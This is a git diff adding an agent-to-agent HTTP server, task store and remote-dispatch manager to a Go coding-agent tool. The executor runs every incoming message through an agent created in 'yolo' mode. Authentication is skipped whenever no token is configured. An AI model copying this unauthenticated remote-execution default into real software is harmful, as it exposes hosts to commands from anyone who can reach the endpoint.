+	CreateForA2A(workDir string, mode string) (*agent.Agent, error)
+}
+
+// NewDefaultExecutor creates a new default executor.
+func NewDefaultExecutor(factory AgentFactory) *DefaultExecutor {
+	return &DefaultExecutor{agentFactory: factory}
+}
+
+// ExecuteTask runs an A2A task through the agent loop.
+func (e *DefaultExecutor) ExecuteTask(ctx context.Context, task *Task, msg *Message) (<-chan TaskEvent, error) {
+	// Extract text from message parts
+	var userInput string
+	for _, part := range msg.Parts {
+		if part.Type == "text" && part.Text != "" {
+			userInput = part.Text
+			break
+		}
+	}
+	if userInput == "" {
+		return nil, fmt.Errorf("no text content in message")
+	}
+
+	// Create agent
+	a, err := e.agentFactory.CreateForA2A("", "yolo")
+	if err != nil {
+		return nil, fmt.Errorf("create agent: %w", err)
+	}
+
+	// Run agent
+	agentCh := a.Run(ctx, userInput)
+
+	// Convert agent events to A2A task events
+	taskCh := make(chan TaskEvent, 100)
+	go func() {
+		defer close(taskCh)
+
+		var response strings.Builder
+		for ev := range agentCh {
+			now := time.Now()
+			switch ev.Type {
+			case agent.EventTextDelta:
+				response.WriteString(ev.TextDelta)
+				taskCh <- TaskEvent{
+					TaskID:    task.ID,
+					State:     TaskStateWorking,
+					Message:   &Message{Role: "agent", Parts: []MessagePart{{Type: "text", Text: ev.TextDelta}}},
+					Timestamp: now,
+				}
+
+			case agent.EventDone:
+				taskCh <- TaskEvent{
+					TaskID: task.ID,
+					State:  TaskStateCompleted,
+					Artifact: &Artifact{
+						Name:  "response",
+						Parts: []MessagePart{{Type: "text", Text: response.String()}},
+					},
+					Timestamp: now,
+				}
+
+			case agent.EventError:
+				errMsg := "unknown error"
+				if ev.Error != nil {
+					errMsg = ev.Error.Error()
+				}
+				taskCh <- TaskEvent{
+					TaskID:    task.ID,
+					State:     TaskStateFailed,
+					Error:     &TaskError{Code: -32000, Message: errMsg},
+					Timestamp: now,
+				}
+
+			case agent.EventToolCall, agent.EventToolExecutionStart, agent.EventToolExecutionEnd:
+				toolName := ev.ToolName
+				if toolName == "" && ev.ToolCall != nil {
+					toolName = ev.ToolCall.Name
+				}
+				if toolName != "" {
+					taskCh <- TaskEvent{
+						TaskID: task.ID,
+						State:  TaskStateWorking,
+						Message: &Message{
+							Role: "agent",
+							Parts: []MessagePart{{
+								Type: "text",
+								Text: fmt.Sprintf("[tool: %s]", toolName),
+							}},
+						},
+						Timestamp: now,
+					}
+				}
+			}
+		}
+	}()
+
+	return taskCh, nil
+}
diff --git a/internal/a2a/handler.go b/internal/a2a/handler.go
new file mode 100644
index 0000000..584683c
--- /dev/null
+++ b/internal/a2a/handler.go
@@ -0,0 +1,337 @@
+package a2a
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"strings"
+	"sync"
+	"time"
+)
+
+// JSONRPCRequest represents a JSON-RPC 2.0 request.
+type JSONRPCRequest struct {
+	JSONRPC string          `json:"jsonrpc"`
+	Method  string          `json:"method"`
+	Params  json.RawMessage `json:"params,omitempty"`
+	ID      any             `json:"id"`
+}
+
+// JSONRPCResponse represents a JSON-RPC 2.0 response.
+type JSONRPCResponse struct {
+	JSONRPC string        `json:"jsonrpc"`
+	Result  any           `json:"result,omitempty"`
+	Error   *JSONRPCError `json:"error,omitempty"`
+	ID      any           `json:"id"`
+}
+
+// JSONRPCError represents a JSON-RPC 2.0 error.
+type JSONRPCError struct {
+	Code    int    `json:"code"`
+	Message string `json:"message"`
+}
+
+// SendMessageParams represents the params for message/send.
+type SendMessageParams struct {
+	TaskID  string   `json:"task_id,omitempty"`
+	Message *Message `json:"message"`
+}
+
+// AgentExecutor processes A2A tasks by running them through the agent loop.
+type AgentExecutor interface {
+	ExecuteTask(ctx context.Context, task *Task, msg *Message) (<-chan TaskEvent, error)
+}
+
+// Handler handles A2A JSON-RPC requests.
+type Handler struct {
+	taskStore   *TaskStore
+	executor    AgentExecutor
+	mu          sync.RWMutex
+	subscribers map[string][]chan TaskEvent
+}
+
+// NewHandler creates a new A2A handler.
+func NewHandler(executor AgentExecutor) *Handler {
+	return &Handler{
+		taskStore:   NewTaskStore(),
+		executor:    executor,
+		subscribers: make(map[string][]chan TaskEvent),
+	}
+}
+
+// GetTaskStore returns the task store.
+func (h *Handler) GetTaskStore() *TaskStore {
+	return h.taskStore
+}
+
+// ServeHTTP handles A2A JSON-RPC requests at /a2a.
+func (h *Handler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodPost {
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+
+	var req JSONRPCRequest
+	if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+		h.writeError(w, nil, -32700, "Parse error")
+		return
+	}
+
+	if req.JSONRPC != "2.0" {
+		h.writeError(w, req.ID, -32600, "Invalid Request: jsonrpc must be \"2.0\"")
+		return
+	}
+
+	isSSE := strings.Contains(r.Header.Get("Accept"), "text/event-stream")
+
+	switch req.Method {
+	case "message/send":
+		h.handleSendMessage(w, r, &req, isSSE)
+	case "task/get":
+		h.handleGetTask(w, &req)
+	case "task/cancel":
+		h.handleCancelTask(w, &req)
+	default:
+		h.writeError(w, req.ID, -32601, "Method not found: "+req.Method)
+	}
+}
+
+// handleSendMessage processes message/send.
+func (h *Handler) handleSendMessage(w http.ResponseWriter, r *http.Request, req *JSONRPCRequest, isSSE bool) {
+	var params SendMessageParams
+	if err := json.Unmarshal(req.Params, &params); err != nil {
+		h.writeError(w, req.ID, -32602, "Invalid params: "+err.Error())
+		return
+	}
+	if params.Message == nil {
+		h.writeError(w, req.ID, -32602, "Invalid params: message is required")
+		return
+	}
+
+	// Create or get task
+	var task *Task
+	if params.TaskID != "" {
+		task = h.taskStore.Get(params.TaskID)
+		if task == nil {
+			h.writeError(w, req.ID, -32000, "Task not found: "+params.TaskID)
+			return
+		}
+	} else {
+		task = h.taskStore.Create(newTaskID())
+	}
+
+	task.Message = params.Message
+	task.State = TaskStateWorking
+	h.taskStore.Update(task)
+
+	if isSSE {
+		h.streamResponse(w, r, task, params.Message)
+	} else {
+		h.syncResponse(w, r, task, params.Message, req.ID)
+	}
+}
+
+// syncResponse processes the task synchronously.
+func (h *Handler) syncResponse(w http.ResponseWriter, r *http.Request, task *Task, msg *Message, reqID any) {
+	eventCh, err := h.executor.ExecuteTask(r.Context(), task, msg)
+	if err != nil {
+		task.State = TaskStateFailed
+		task.Error = &TaskError{Code: -32000, Message: err.Error()}
+		h.taskStore.Update(task)
+		h.writeError(w, reqID, -32000, err.Error())
+		return
+	}
+
+	var lastEvent TaskEvent
+	for ev := range eventCh {
+		lastEvent = ev
+		h.broadcast(task.ID, ev)
+	}
+
+	task.State = lastEvent.State
+	if lastEvent.Error != nil {
+		task.Error = lastEvent.Error
+	}
+	if lastEvent.Artifact != nil {
+		task.Artifacts = append(task.Artifacts, *lastEvent.Artifact)
+	}
+	h.taskStore.Update(task)
+
+	w.Header().Set("Content-Type", "application/json")
+	json.NewEncoder(w).Encode(JSONRPCResponse{JSONRPC: "2.0", Result: task, ID: reqID})
+}
+
+// streamResponse processes the task with SSE streaming.
+func (h *Handler) streamResponse(w http.ResponseWriter, r *http.Request, task *Task, msg *Message) {
+	flusher, ok := w.(http.Flusher)
+	if !ok {
+		http.Error(w, "streaming not supported", http.StatusInternalServerError)
+		return
+	}
+
+	w.Header().Set("Content-Type", "text/event-stream")
+	w.Header().Set("Cache-Control", "no-cache")
+	w.Header().Set("Connection", "keep-alive")
+
+	eventCh, err := h.executor.ExecuteTask(r.Context(), task, msg)
+	if err != nil {
+		task.State = TaskStateFailed
+		task.Error = &TaskError{Code: -32000, Message: err.Error()}
+		h.taskStore.Update(task)
+		h.writeSSE(w, flusher, TaskEvent{TaskID: task.ID, State: TaskStateFailed, Error: task.Error, Timestamp: time.Now()})
+		return
+	}
+
+	for ev := range eventCh {
+		h.writeSSE(w, flusher, ev)
+		h.broadcast(task.ID, ev)
+		if ev.State == TaskStateCompleted || ev.State == TaskStateFailed {
+			task.State = ev.State
+			if ev.Error != nil {
+				task.Error = ev.Error
+			}
+			if ev.Artifact != nil {
+				task.Artifacts = append(task.Artifacts, *ev.Artifact)
+			}
+			h.taskStore.Update(task)
+		}
+	}
+}
+
+// handleGetTask returns the current state of a task.
+func (h *Handler) handleGetTask(w http.ResponseWriter, req *JSONRPCRequest) {
+	var params struct {
+		TaskID string `json:"task_id"`
+	}
+	if err := json.Unmarshal(req.Params, &params); err != nil {
+		h.writeError(w, req.ID, -32602, "Invalid params: "+err.Error())
+		return
+	}
+	task := h.taskStore.Get(params.TaskID)
+	if task == nil {
+		h.writeError(w, req.ID, -32000, "Task not found: "+params.TaskID)
+		return
+	}
+	w.Header().Set("Content-Type", "application/json")
+	json.NewEncoder(w).Encode(JSONRPCResponse{JSONRPC: "2.0", Result: task, ID: req.ID})
+}
+
+// handleCancelTask cancels a running task.
+func (h *Handler) handleCancelTask(w http.ResponseWriter, req *JSONRPCRequest) {
+	var params struct {
+		TaskID string `json:"task_id"`
+	}
+	if err := json.Unmarshal(req.Params, &params); err != nil {
+		h.writeError(w, req.ID, -32602, "Invalid params: "+err.Error())
+		return
+	}
+	task := h.taskStore.Get(params.TaskID)
+	if task == nil {
+		h.writeError(w, req.ID, -32000, "Task not found: "+params.TaskID)
+		return
+	}
+	if task.State != TaskStateWorking && task.State != TaskStateSubmitted {
+		h.writeError(w, req.ID, -32000, "Task cannot be canceled in state: "+string(task.State))
+		return
+	}
+	task.State = TaskStateCanceled
+	h.taskStore.Update(task)
+	w.Header().Set("Content-Type", "application/json")
+	json.NewEncoder(w).Encode(JSONRPCResponse{JSONRPC: "2.0", Result: task, ID: req.ID})
+}
+
+// Subscribe adds an SSE subscriber for task events.
+func (h *Handler) Subscribe(taskID string) chan TaskEvent {
+	ch := make(chan TaskEvent, 100)
+	h.mu.Lock()
+	h.subscribers[taskID] = append(h.subscribers[taskID], ch)
+	h.mu.Unlock()
+	return ch
+}
+
+// Unsubscribe removes an SSE subscriber.
+func (h *Handler) Unsubscribe(taskID string, ch chan TaskEvent) {
+	h.mu.Lock()
+	defer h.mu.Unlock()
+	subs := h.subscribers[taskID]
+	for i, sub := range subs {
+		if sub == ch {
+			h.subscribers[taskID] = append(subs[:i], subs[i+1:]...)
+			close(ch)
+			break
+		}
+	}
+}
+
+// broadcast sends an event to all subscribers of a task.
+func (h *Handler) broadcast(taskID string, event TaskEvent) {
+	h.mu.RLock()
+	subs := h.subscribers[taskID]
+	h.mu.RUnlock()
+	for _, ch := range subs {
+		select {
+		case ch <- event:
+		default:
+		}
+	}
+}
+
+// writeError writes a JSON-RPC error response.
+func (h *Handler) writeError(w http.ResponseWriter, id any, code int, msg string) {
+	w.Header().Set("Content-Type", "application/json")
+	json.NewEncoder(w).Encode(JSONRPCResponse{
+		JSONRPC: "2.0",
+		Error:   &JSONRPCError{Code: code, Message: msg},
+		ID:      id,
+	})
+}
+
+// writeSSE writes an SSE event.
+func (h *Handler) writeSSE(w http.ResponseWriter, flusher http.Flusher, event TaskEvent) {
+	data, _ := json.Marshal(event)
+	fmt.Fprintf(w, "data: %s\n\n", data)
+	flusher.Flush()
+}
+
+// SubscribeSSE handles SSE subscription for task events at /a2a/events.
+func (h *Handler) SubscribeSSE(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodGet {
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+	taskID := r.URL.Query().Get("task_id")
+	if taskID == "" {
+		http.Error(w, "task_id is required", http.StatusBadRequest)
+		return
+	}
+	flusher, ok := w.(http.Flusher)
+	if !ok {
+		http.Error(w, "streaming not supported", http.StatusInternalServerError)
+		return
+	}
+
+	w.Header().Set("Content-Type", "text/event-stream")
+	w.Header().Set("Cache-Control", "no-cache")
+	w.Header().Set("Connection", "keep-alive")
+
+	ch := h.Subscribe(taskID)
+	defer h.Unsubscribe(taskID, ch)
+
+	for {
+		select {
+		case <-r.Context().Done():
+			return
+		case event, ok := <-ch:
+			if !ok {
+				return
+			}
+			data, _ := json.Marshal(event)
+			fmt.Fprintf(w, "data: %s\n\n", data)
+			flusher.Flush()
+			if event.State == TaskStateCompleted || event.State == TaskStateFailed || event.State == TaskStateCanceled {
+				return
+			}
+		}
+	}
+}
diff --git a/internal/a2a/master.go b/internal/a2a/master.go
new file mode 100644
index 0000000..0c4ae08
--- /dev/null
+++ b/internal/a2a/master.go
@@ -0,0 +1,189 @@
+package a2a
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"sync"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+// AgentEntry describes a remote A2A agent in a2a-list.json.
+type AgentEntry struct {
+	Name      string `json:"name"`
+	URL       string `json:"url"`
+	AuthToken string `json:"auth_token,omitempty"`
+}
+
+// AgentListConfig is the top-level structure of a2a-list.json.
+type AgentListConfig struct {
+	Agents []AgentEntry `json:"agents"`
+}
+
+// AgentListConfigPath returns the path to the global a2a-list.json.
+func AgentListConfigPath() string {
+	return filepath.Join(config.ConfigDir(), "a2a-list.json")
+}
+
+// ProjectAgentListConfigPath returns the path to the project-level .vibe/a2a-list.json.
+func ProjectAgentListConfigPath() string {
+	return filepath.Join(".vibe", "a2a-list.json")
+}
+
+// LoadAgentList loads a2a-list.json from the given path.
+func LoadAgentList(path string) (*AgentListConfig, error) {
+	data, err := os.ReadFile(path)
+	if err != nil {
+		return nil, fmt.Errorf("read a2a-list.json: %w", err)
+	}
+	var cfg AgentListConfig
+	if err := json.Unmarshal(data, &cfg); err != nil {
+		return nil, fmt.Errorf("parse a2a-list.json: %w", err)
+	}
+	return &cfg, nil
+}
+
+// SaveAgentList writes the agent list config to a JSON file.
+func SaveAgentList(path string, cfg *AgentListConfig) error {
+	if err := os.MkdirAll(filepath.Dir(path), 0700); err != nil {
+		return fmt.Errorf("create config directory: %w", err)
+	}
+	data, err := json.MarshalIndent(cfg, "", "  ")
+	if err != nil {
+		return fmt.Errorf("marshal a2a-list config: %w", err)
+	}
+	return os.WriteFile(path, data, 0600)
+}
+
+// InitA2AMasterConfig creates a sample a2a-list.json at the default location.
+// Returns the file path. If force is false and the file already exists, returns an error.
+func InitA2AMasterConfig(force bool) (string, error) {
+	path := AgentListConfigPath()
+	if !force {
+		if _, err := os.Stat(path); err == nil {
+			return path, fmt.Errorf("a2a-list.json already exists: %s", path)
+		}
+	}
+	cfg := &AgentListConfig{
+		Agents: []AgentEntry{
+			{
+				Name:      "code-reviewer",
+				URL:       "http://localhost:8093",
+				AuthToken: "",
+			},
+			{
+				Name:      "ci-agent",
+				URL:       "http://ci-server:8093",
+				AuthToken: "change-me-to-a-random-secret",
+			},
+		},
+	}
+	if err := SaveAgentList(path, cfg); err != nil {
+		return "", err
+	}
+	return path, nil
+}
+
+// A2AManager manages a list of remote A2A agents and provides dispatch methods.
+type A2AManager struct {
+	mu      sync.RWMutex
+	entries map[string]*AgentEntry
+	order   []string
+}
+
+// NewA2AManager creates a new A2A manager from a config.
+func NewA2AManager(cfg *AgentListConfig) *A2AManager {
+	m := &A2AManager{
+		entries: make(map[string]*AgentEntry),
+	}
+	if cfg != nil {
+		for i := range cfg.Agents {
+			e := &cfg.Agents[i]
+			m.entries[e.Name] = e
+			m.order = append(m.order, e.Name)
+		}
+	}
+	return m
+}
+
+// List returns all registered agent entries in order.
+func (m *A2AManager) List() []*AgentEntry {
+	m.mu.RLock()
+	defer m.mu.RUnlock()
+	var result []*AgentEntry
+	for _, name := range m.order {
+		if e, ok := m.entries[name]; ok {
+			result = append(result, e)
+		}
+	}
+	return result
+}
+
+// Get returns an agent entry by name.
+func (m *A2AManager) Get(name string) (*AgentEntry, bool) {
+	m.mu.RLock()
+	defer m.mu.RUnlock()
+	e, ok := m.entries[name]
+	return e, ok
+}
+
+// Dispatch sends a message to the named remote A2A agent and returns the response text.
+func (m *A2AManager) Dispatch(ctx context.Context, name, message string) (string, error) {
+	m.mu.RLock()
+	entry, ok := m.entries[name]
+	m.mu.RUnlock()
+	if !ok {
+		return "", fmt.Errorf("agent '%s' not found in a2a-list", name)
+	}
+
+	client := NewClient(entry.URL, entry.AuthToken)
+	task, err := client.SendMessage(ctx, "", &Message{
+		Role:  "user",
+		Parts: []MessagePart{{Type: "text", Text: message}},
+	})
+	if err != nil {
+		return "", fmt.Errorf("dispatch to '%s': %w", name, err)
+	}
+
+	// Extract response text
+	if len(task.Artifacts) > 0 {
+		var texts []string
+		for _, a := range task.Artifacts {
+			for _, p := range a.Parts {
+				if p.Type == "text" && p.Text != "" {
+					texts = append(texts, p.Text)
+				}
+			}
+		}
+		if len(texts) > 0 {
+			return joinTexts(texts), nil
+		}
+	}
+	if task.Message != nil {
+		var texts []string
+		for _, p := range task.Message.Parts {
+			if p.Type == "text" && p.Text != "" {
+				texts = append(texts, p.Text)
+			}
+		}
+		if len(texts) > 0 {
+			return joinTexts(texts), nil
+		}
+	}
+
+	return "(no text response from agent)", nil
+}
+
+func joinTexts(texts []string) string {
+	result := ""
+	for i, t := range texts {
+		if i > 0 {
+			result += "\n"
+		}
+		result += t
+	}
+	return result
+}
diff --git a/internal/a2a/server.go b/internal/a2a/server.go
new file mode 100644
index 0000000..6526b13
--- /dev/null
+++ b/internal/a2a/server.go
@@ -0,0 +1,258 @@
+package a2a
+
+import (
+	"context"
+	"crypto/subtle"
+	"encoding/json"
+	"fmt"
+	"log"
+	"net/http"
+	"os"
+	"os/signal"
+	"syscall"
+	"time"
+)
+
+// Server is the A2A HTTP server.
+type Server struct {
+	cfg     *Config
+	version string
+	handler *Handler
+	mux     *http.ServeMux
+	httpSrv *http.Server
+	card    *AgentCard
+}
+
+// NewServer creates a new A2A server.
+func NewServer(cfg *Config, version string, executor AgentExecutor) *Server {
+	handler := NewHandler(executor)
+	mux := http.NewServeMux()
+
+	serverURL := fmt.Sprintf("http://%s", cfg.GetListenAddr())
+	card := DefaultAgentCard(version, serverURL)
+	if cfg.AgentCard != nil {
+		if cfg.AgentCard.Name != "" {
+			card.Name = cfg.AgentCard.Name
+		}
+		if cfg.AgentCard.Description != "" {
+			card.Description = cfg.AgentCard.Description
+		}
+		if cfg.AgentCard.Version != "" {
+			card.Version = cfg.AgentCard.Version
+		}
+	}
+
+	s := &Server{
+		cfg:     cfg,
+		version: version,
+		handler: handler,
+		mux:     mux,
+		card:    card,
+	}
+
+	s.registerRoutes()
+	return s
+}
+
+// GetHandler returns the A2A handler (for integration mode).
+func (s *Server) GetHandler() *Handler {
+	return s.handler
+}
+
+// GetCard returns the Agent Card.
+func (s *Server) GetCard() *AgentCard {
+	return s.card
+}
+
+// registerRoutes registers all A2A HTTP routes.
+func (s *Server) registerRoutes() {
+	// Agent Card
+	s.mux.HandleFunc("/.well-known/agent.json", HandleAgentCard(s.card))
+
+	// JSON-RPC endpoint
+	s.mux.Handle("/a2a", s.withAuth(s.handler))
+
+	// REST-style endpoints (alternative to JSON-RPC)
+	s.mux.HandleFunc("/a2a/send", s.withAuthFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != http.MethodPost {
+			http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+			return
+		}
+		isSSE := r.Header.Get("Accept") == "text/event-stream"
+		var req struct {
+			TaskID  string   `json:"task_id,omitempty"`
+			Message *Message `json:"message"`
+		}
+		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+			http.Error(w, "invalid request body", http.StatusBadRequest)
+			return
+		}
+		if req.Message == nil {
+			http.Error(w, "message is required", http.StatusBadRequest)
+			return
+		}
+		var task *Task
+		if req.TaskID != "" {
+			task = s.handler.taskStore.Get(req.TaskID)
+			if task == nil {
+				http.Error(w, "task not found", http.StatusNotFound)
+				return
+			}
+		} else {
+			task = s.handler.taskStore.Create(newTaskID())
+		}
+		task.Message = req.Message
+		task.State = TaskStateWorking
+		s.handler.taskStore.Update(task)
+		if isSSE {
+			s.handler.streamResponse(w, r, task, req.Message)
+		} else {
+			s.handler.syncResponse(w, r, task, req.Message, nil)
+		}
+	}))
+
+	s.mux.HandleFunc("/a2a/task", s.withAuthFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != http.MethodGet {
+			http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+			return
+		}
+		taskID := r.URL.Query().Get("task_id")
+		if taskID == "" {
+			http.Error(w, "task_id required", http.StatusBadRequest)
+			return
+		}
+		task := s.handler.taskStore.Get(taskID)
+		if task == nil {
+			http.Error(w, "task not found", http.StatusNotFound)
+			return
+		}
+		w.Header().Set("Content-Type", "application/json")
+		json.NewEncoder(w).Encode(task)
+	}))
+
+	s.mux.HandleFunc("/a2a/task/cancel", s.withAuthFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != http.MethodPost {
+			http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+			return
+		}
+		var req struct {
+			TaskID string `json:"task_id"`
+		}
+		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+			http.Error(w, "invalid request body", http.StatusBadRequest)
+			return
+		}
+		task := s.handler.taskStore.Get(req.TaskID)
+		if task == nil {
+			http.Error(w, "task not found", http.StatusNotFound)
+			return
+		}
+		if task.State != TaskStateWorking && task.State != TaskStateSubmitted {
+			http.Error(w, "cannot cancel task in state: "+string(task.State), http.StatusConflict)
+			return
+		}
+		task.State = TaskStateCanceled
+		s.handler.taskStore.Update(task)
+		w.Header().Set("Content-Type", "application/json")
+		json.NewEncoder(w).Encode(task)
+	}))
+
+	// SSE event stream
+	s.mux.HandleFunc("/a2a/events", s.withAuthFunc(s.handler.SubscribeSSE))
+}
+
+// RegisterRoutes registers A2A routes on an external mux (for integration mode).
+func (s *Server) RegisterRoutes(mux *http.ServeMux) {
+	mux.Handle("/.well-known/agent.json", HandleAgentCard(s.card))
+	mux.Handle("/a2a", s.withAuth(s.handler))
+	mux.HandleFunc("/a2a/events", s.withAuthFunc(s.handler.SubscribeSSE))
+}
+
+func (s *Server) withAuth(next http.Handler) http.Handler {
+	if s.cfg.AuthToken == "" {
+		return next
+	}
+	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if !validBearerToken(r, s.cfg.AuthToken) {
+			http.Error(w, "unauthorized", http.StatusUnauthorized)
+			return
+		}
+		next.ServeHTTP(w, r)
+	})
+}
+
+func (s *Server) withAuthFunc(next http.HandlerFunc) http.HandlerFunc {
+	return s.withAuth(next).ServeHTTP
+}
+
+func validBearerToken(r *http.Request, want string) bool {
+	const prefix = "Bearer "
+	auth := r.Header.Get("Authorization")
+	if len(auth) <= len(prefix) || auth[:len(prefix)] != prefix {
+		return false
+	}
+	got := auth[len(prefix):]
+	if len(got) != len(want) {
+		return false
+	}
+	return subtle.ConstantTimeCompare([]byte(got), []byte(want)) == 1
+}
+
+// Start starts the A2A server in standalone mode. Blocks until stopped.
+func (s *Server) Start() error {
+	s.httpSrv = &http.Server{
+		Addr:         s.cfg.GetListenAddr(),
+		Handler:      s.mux,
+		ReadTimeout:  30 * time.Second,
+		WriteTimeout: 300 * time.Second,
+		IdleTimeout:  120 * time.Second,
+	}
+
+	log.Printf("A2A server listening on %s", s.cfg.GetListenAddr())
+	return s.httpSrv.ListenAndServe()
+}
+
+// Stop gracefully shuts down the server.
+func (s *Server) Stop(timeout time.Duration) error {
+	if s.httpSrv == nil {
+		return nil
+	}
+	ctx, cancel := context.WithTimeout(context.Background(), timeout)
+	defer cancel()
+	return s.httpSrv.Shutdown(ctx)
+}
+
+// Run starts the A2A server in standalone mode with signal handling.
+func Run(cfg *Config, version string, executor AgentExecutor) error {
+	srv := NewServer(cfg, version, executor)
+
+	// Start server
+	errCh := make(chan error, 1)
+	go func() {
+		if err := srv.Start(); err != nil && err != http.ErrServerClosed {
+			errCh <- err
+		}
+	}()
+
+	fmt.Fprintf(os.Stderr, "VibeCoding A2A Server v%s starting\n", version)
+	fmt.Fprintf(os.Stderr, "  Endpoint: http://%s/a2a\n", cfg.GetListenAddr())
+	fmt.Fprintf(os.Stderr, "  Agent Card: http://%s/.well-known/agent.json\n", cfg.GetListenAddr())
+	fmt.Fprintf(os.Stderr, "  WorkDir: %s\n", cfg.GetWorkDir())
+	fmt.Fprintf(os.Stderr, "\nReady to serve.\n")
+
+	// Wait for interrupt
+	sigCh := make(chan os.Signal, 1)
+	signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
+
+	select {
+	case err := <-errCh:
+		return fmt.Errorf("a2a server error: %w", err)
+	case sig := <-sigCh:
+		fmt.Fprintf(os.Stderr, "\nReceived %s, shutting down...\n", sig)
+		if err := srv.Stop(10 * time.Second); err != nil {
+			log.Printf("A2A server shutdown error: %v", err)
+		}
+	}
+
+	return nil
+}
diff --git a/internal/a2a/task.go b/internal/a2a/task.go
new file mode 100644
index 0000000..95619fa
--- /dev/null
+++ b/internal/a2a/task.go
@@ -0,0 +1,190 @@
+package a2a
+
+import (
+	"crypto/rand"
+	"encoding/hex"
+	"fmt"
+	"sync"
+	"sync/atomic"
+	"time"
+)
+
+var fallbackTaskCounter uint64
+
+// TaskState represents the state of an A2A task.
+type TaskState string
+
+const (
+	TaskStateSubmitted TaskState = "submitted"
+	TaskStateWorking   TaskState = "working"
+	TaskStateCompleted TaskState = "completed"
+	TaskStateFailed    TaskState = "failed"
+	TaskStateCanceled  TaskState = "canceled"
+)
+
+// Task represents an A2A task.
+type Task struct {
+	ID        string         `json:"id"`
+	State     TaskState      `json:"state"`
+	Message   *Message       `json:"message,omitempty"`
+	Artifacts []Artifact     `json:"artifacts,omitempty"`
+	Error     *TaskError     `json:"error,omitempty"`
+	Metadata  map[string]any `json:"metadata,omitempty"`
+	CreatedAt time.Time      `json:"created_at"`
+	UpdatedAt time.Time      `json:"updated_at"`
+}
+
+// Message represents an A2A message (text or structured).
+type Message struct {
+	Role     string         `json:"role"` // "user" or "agent"
+	Parts    []MessagePart  `json:"parts"`
+	Metadata map[string]any `json:"metadata,omitempty"`
+}
+
+// MessagePart is a part of a message.
+type MessagePart struct {
+	Type string `json:"type"` // "text"
+	Text string `json:"text,omitempty"`
+}
+
+// Artifact represents output produced by an agent task.
+type Artifact struct {
+	Name        string         `json:"name,omitempty"`
+	Description string         `json:"description,omitempty"`
+	Parts       []MessagePart  `json:"parts"`
+	Metadata    map[string]any `json:"metadata,omitempty"`
+}
+
+// TaskError represents an error in task processing.
+type TaskError struct {
+	Code    int    `json:"code"`
+	Message string `json:"message"`
+}
+
+// TaskStore manages task storage.
+type TaskStore struct {
+	mu    sync.RWMutex
+	tasks map[string]*Task
+}
+
+// TaskEvent is sent via SSE for streaming task updates.
+type TaskEvent struct {
+	TaskID    string     `json:"task_id"`
+	State     TaskState  `json:"state"`
+	Message   *Message   `json:"message,omitempty"`
+	Artifact  *Artifact  `json:"artifact,omitempty"`
+	Error     *TaskError `json:"error,omitempty"`
+	Timestamp time.Time  `json:"timestamp"`
+}
+
+// NewTaskStore creates a new task store.
+func NewTaskStore() *TaskStore {
+	return &TaskStore{
+		tasks: make(map[string]*Task),
+	}
+}
+
+func newTaskID() string {
+	var b [16]byte
+	if _, err := rand.Read(b[:]); err == nil {
+		return "task_" + hex.EncodeToString(b[:])
+	}
+	n := atomic.AddUint64(&fallbackTaskCounter, 1)
+	return fmt.Sprintf("task_%d_%d", time.Now().UnixNano(), n)
+}
+
+// Create creates a new task.
+func (s *TaskStore) Create(id string) *Task {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	now := time.Now()
+	task := &Task{
+		ID:        id,
+		State:     TaskStateSubmitted,
+		CreatedAt: now,
+		UpdatedAt: now,
+		Metadata:  make(map[string]any),
+	}
+	s.tasks[id] = task
+	return task.Clone()
+}
+
+// Get returns a task by ID.
+func (s *TaskStore) Get(id string) *Task {
+	s.mu.RLock()
+	defer s.mu.RUnlock()
+	task := s.tasks[id]
+	if task == nil {
+		return nil
+	}
+	return task.Clone()
+}
+
+// Update updates a task.
+func (s *TaskStore) Update(task *Task) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	copy := task.Clone()
+	copy.UpdatedAt = time.Now()
+	s.tasks[copy.ID] = copy
+}
+
+// SetState updates the task state.
+func (s *TaskStore) SetState(id string, state TaskState) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	if task, ok := s.tasks[id]; ok {
+		task.State = state
+		task.UpdatedAt = time.Now()
+	}
+}
+
+// Clone returns a deep copy of the task value.
+func (t *Task) Clone() *Task {
+	if t == nil {
+		return nil
+	}
+	copy := *t
+	copy.Message = cloneMessage(t.Message)
+	if len(t.Artifacts) > 0 {
+		copy.Artifacts = make([]Artifact, len(t.Artifacts))
+		for i := range t.Artifacts {
+			copy.Artifacts[i] = cloneArtifact(t.Artifacts[i])
+		}
+	}
+	if t.Error != nil {
+		errCopy := *t.Error
+		copy.Error = &errCopy
+	}
+	copy.Metadata = cloneMap(t.Metadata)
+	return &copy
+}
+
+func cloneMessage(msg *Message) *Message {
+	if msg == nil {
+		return nil
+	}
+	copy := *msg
+	copy.Parts = append([]MessagePart(nil), msg.Parts...)
+	copy.Metadata = cloneMap(msg.Metadata)
+	return &copy
+}
+
+func cloneArtifact(artifact Artifact) Artifact {
+	copy := artifact
+	copy.Parts = append([]MessagePart(nil), artifact.Parts...)
+	copy.Metadata = cloneMap(artifact.Metadata)
+	return copy
+}
+
+func cloneMap(m map[string]any) map[string]any {
+	if len(m) == 0 {
+		return nil
+	}
+	copy := make(map[string]any, len(m))
+	for k, v := range m {
+		copy[k] = v
+	}
+	return copy
+}
diff --git a/internal/acp/acp.go b/internal/acp/acp.go
index c849b26..fe26b63 100644
--- a/internal/acp/acp.go
+++ b/internal/acp/acp.go
@@ -2,6 +2,7 @@ package acp
 
 import (
 	"bufio"
